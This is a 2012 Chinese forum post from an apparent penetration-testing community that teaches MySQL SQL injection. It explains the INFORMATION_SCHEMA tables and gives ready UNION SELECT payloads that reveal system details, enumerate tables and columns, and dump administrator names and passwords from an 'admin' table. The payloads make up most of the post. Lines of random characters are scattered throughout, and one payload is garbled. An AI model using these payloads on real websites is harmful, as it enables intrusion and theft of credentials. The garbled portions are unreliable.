中国网络渗透测试联盟
标题:
mysql常规注入
[打印本页]
作者:
admin
时间:
2012-9-13 17:48
标题:
mysql常规注入
本文介绍MYSQL盲注的一些语句和方法
8 t9 H9 o& D+ z1 b
- i- ~% R# j" ]
学习盲注前先了解下 IFORMATION_SCHEMA 库
& `9 } A4 H% s7 V
/ y3 D" U0 |1 _' b4 p
Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有
6 d$ r% o* |- l
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。
" F" G9 r2 g; m0 k
1.得到所有数据库名:
! f$ @1 z; @7 y& l" i9 a$ `6 @
|SCHEMATA ->存储数据库名的表
' e) `1 v1 K f
|---字段:SCHEMA_NAME ->数据库名称
# F# O0 g" s7 ~1 J; v
+ N+ n4 v, h7 e9 @& G5 [
|TABLES ->存储表名
, ~$ O3 u: h' b# k# m6 P% ~! N
|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名
- s( n3 z3 a* K/ g S6 z, Y& t
|---字段:TABLE_NAME ->存储表的表名
% |3 ^% b Z. h% V q1 F
! r* k. I1 Z' z- P' v8 l
|COLUMNS ->存储的字段名表
/ P, L/ y( [( `) u2 x
|---字段:TABLE_SCHEMA ->该字段所属数据库名
, w2 Q% C( ?3 J" R/ H% M) C
|---字段:TABLE_NAME ->存储所属表的名称
* q4 X% H- E* o# ^
; \: r0 Q; H# u9 P/ _
|---字段:COLUMN_NAME ->该字段的名称
# F3 r* v9 v1 U% _
, f d. i. A1 L& `
- V) I X- y2 h5 t" ?
! W7 F) n% s: t
###########################################################################
: T# U' X+ L$ O9 O- @" `4 V$ ?
& K3 y! g* f1 F' I+ F
0x001 获取系统信息:
; v' \* q6 @: W }0 G
E) X6 Q. D% q- c: z' u+ q
union select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
" m/ v$ [5 W% U# o; s* q; b
; Q' }1 o; X: ^" W( v+ y
/*
- w2 F* ?+ F! L3 [ A! A
0 |7 u& T5 P! r8 @* L" l
@@global.version_compile_os 获取系统版本
8 p7 d/ @. J& s3 H8 w& t
: O) a! \) d! {3 j, G8 h
@@datadir 数据库路径
( b" y1 S; x, S. V
database() 当前数据库名称
+ j2 U) G0 L0 T6 O; V
0x3c62723e 换行HEX值
& c4 v: H# U+ s* g
/ `0 K$ x& \& ?' \
*/
. S7 P. ^6 K5 \4 O2 I
$ e: V; I ^% t* _# E: T
* j( ^& s; e, _' C+ p) J7 p
0 \0 ]/ D. [: g' O8 s7 @
######################################################################
& ]+ r5 e9 m/ v. Y7 b N
- \' q7 z" ?6 ^1 J
0x002 获取表名
' C$ L# b4 \+ M0 _9 b+ S
" `0 M6 p, a- f
union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*
' R5 K# s* [* w5 f4 f8 k' M
3 g) X7 P: w) z1 R
; X0 \; ^) x7 ?& ~ k
) b0 K# }% N& Q( f
/*
: f9 z& r1 d! r! D& a
/ ^" T4 c. [3 y% J- I
0x67617264656e 为当前数据库名
8 A2 O( `+ j. w
/ [& G8 q6 s6 L' D. Z, J# \- v
group_concat(table_name) 使用group_concat函数 一步获得该库所有表名
9 [2 h4 B$ _5 I
3 W# t0 G+ ^! g( o- p
*/
2 _) I) J; ~: C) P" N r2 i8 x
! ~! `& y; `3 Q
######################################################################
5 H9 t% [4 z1 d
( \& n: w& s4 V0 X" G
% C" m( {; V4 L& E: b4 @- O
* _: k& N! d( O% e3 B# C7 e
0x003 获取字段
$ a) Q! t/ W6 L% D4 _, r! \
6 M* G7 G0 g$ p ^ x4 Q6 ]. ?
union select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*
4 J) q0 d, s5 i- x6 Y
+ j |: w9 q! g' F3 z# d
/*
$ p) t K/ @9 i) B; c/ y0 R
+ C, [+ R8 \8 t8 |
group_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段
2 R S* q0 ^3 \
* d2 g2 i0 i A
0x61646d696e ->选择一个表
C& z0 U4 ~, n1 t' u# d/ q& p
* p9 q# J' p; d# u' [% j( ?: H
0x67617264656e ->数据库名
! k4 q) }; E8 E8 I3 }" P* C' v
' o% ]$ S% n# t* z( J
*/
5 [7 s8 `5 o! a& j* l
, ]. I; H9 f7 r3 W. o
#####################################################################
! A7 ]4 S0 M5 X( w/ v
4 q5 ~( @* B' f5 Y W6 Q
) ?# x0 v7 i/ o9 `: V# n H) e) }, W
$ A& f- M, Z z, C4 J2 V
0x004 获取数据
7 a5 [6 f/ k1 g: X* w/ t5 {* H8 R9 o
1 y/ r4 K1 x* C
union select 1,2,3
2 k: U9 W5 F: B: L& A. ]; _
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin
7 R- L5 L2 H( x$ y' F! z
5 {7 j2 G1 m- a0 U9 ^; R$ m' `
union select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin
+ N% J0 ]$ h D, U
|' ^# B2 x# ]5 L- \
: J: i; [% g0 d& {, K
) @3 Q5 w% N; |1 k1 y7 \3 E( O
/*
: ], o, v& U& D' w A
9 D+ \4 j0 Y) `" s
0x3c62723e 换行符号HEX编码
' t% X$ Z3 x/ k8 H8 \
# ?, F! G& M; X2 }( f. \: a
group_concat 同时获得该字段所有数据
$ Y9 @: i2 ]% m, |( c4 t, d
9 [5 ], `' E7 v2 H3 s
*/
% V2 h7 A) q! A6 c8 ]! |, ^' P
2 h! S$ T ^/ y% @
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2